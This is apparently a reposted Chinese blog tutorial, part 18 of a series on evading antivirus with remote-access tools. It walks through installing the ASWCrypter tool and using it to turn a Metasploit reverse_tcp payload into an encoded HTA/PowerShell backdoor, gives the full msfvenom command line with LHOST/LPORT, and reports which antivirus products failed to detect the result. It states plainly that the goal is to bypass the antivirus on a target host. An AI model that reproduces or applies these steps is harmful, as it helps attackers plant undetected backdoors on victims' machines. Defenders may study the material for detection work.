远控免杀专题(18)-ASWCrypter免杀
免殺能力一覽表
幾點說明:
1、上表中標(biāo)識 √ 說明相應(yīng)殺毒軟件未檢測出病毒,也就是代表了Bypass。
2、為了更好的對比效果,大部分測試payload均使用msf的windows/meterperter/reverse_tcp模塊生成。
3、由于本機測試時只是安裝了360全家桶和火絨,所以默認(rèn)情況下360和火絨殺毒情況指的是靜態(tài)+動態(tài)查殺。360殺毒版本5.0.0.8160(2020.01.01),火絨版本5.0.34.16(2020.01.01),360安全衛(wèi)士12.0.0.2002(2020.01.01)。
4、其他殺軟的檢測指標(biāo)是在virustotal.com(簡稱VT)上在線查殺,所以可能只是代表了靜態(tài)查殺能力,數(shù)據(jù)僅供參考,不足以作為免殺或殺軟查殺能力的判斷指標(biāo)。
5、完全不必要苛求一種免殺技術(shù)能bypass所有殺軟,這樣的技術(shù)肯定是有的,只是沒被公開,一旦公開第二天就能被殺了,其實我們只要能bypass目標(biāo)主機上的殺軟就足夠了。
一、ASWCrypter介紹
ASWCrypter是2018年開源的免殺工具,原理比較簡單,使用msf生成hta代碼,然后使用python腳本對hta代碼進行一定編碼處理,生成新的hta后門文件,從而達到免殺效果。
二、安裝ASWCrypter
需要本機安裝metasploit和python環(huán)境。
ASWCrypter的安裝比較簡單,先git clone到本地
git clone https://github.com/AbedAlqaderSwedan1/ASWCrypter.git進入ASWCrypter目錄,執(zhí)行chmod +x ./ASWCrypter.sh。
執(zhí)行./ASWCrypter.sh即可運行ASWCrypter。
三、ASWCrypter使用說明
使用時需要注意的只有一點,就是要在linux桌面環(huán)境中運行,因為在ASWCrypter.sh腳本中,調(diào)用msfvenom生成后門時使用了xterm。
xterm -T "SHELLCODE GENERATOR(ASWCrypter)" -geometry 100x50 -e "msfvenom -p $paylo LHOST=$lhost LPORT=$lport -i 43 -f hta-psh > $getPATH/output/chars.raw"四、利用ASWCrypter生成后門
執(zhí)行./ASWCrypter.sh,選擇G,第一步也只有這個能選
然后輸入LHOST和LPORT
后門選擇payload,我還是選擇最常規(guī)的reverse_tcp了,文件名就隨便輸一個了
之后提示生成test4.hta成功,后面會提示是否開啟msf監(jiān)聽,我這就不需要了,還是在mac上監(jiān)聽端口。
不開殺軟的時候可正常上線
打開殺軟,火絨靜態(tài)和動態(tài)都能查殺,360動態(tài)+靜態(tài)都沒報警。
試了下msfvenom生成的原始的hta文件的查殺率
virustotal.com上查殺率為28/56
五、ASWCrypter小結(jié)
ASWCrypter是使用msfvenom生成基于powershell的hta后門文件,然后進行編碼處理,達到一定的免殺效果,不過因為會調(diào)用powershell,行為檢測還是很容易被檢測出來。
六、參考資料
官方Github:https://github.com/abedalqaderswedan1/aswcrypter
總結(jié)
以上是生活随笔為你收集整理的远控免杀专题(18)-ASWCrypter免杀的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 远控免杀专题(17)-Python-Ro
- 下一篇: 远控免杀专题(19)-nps_paylo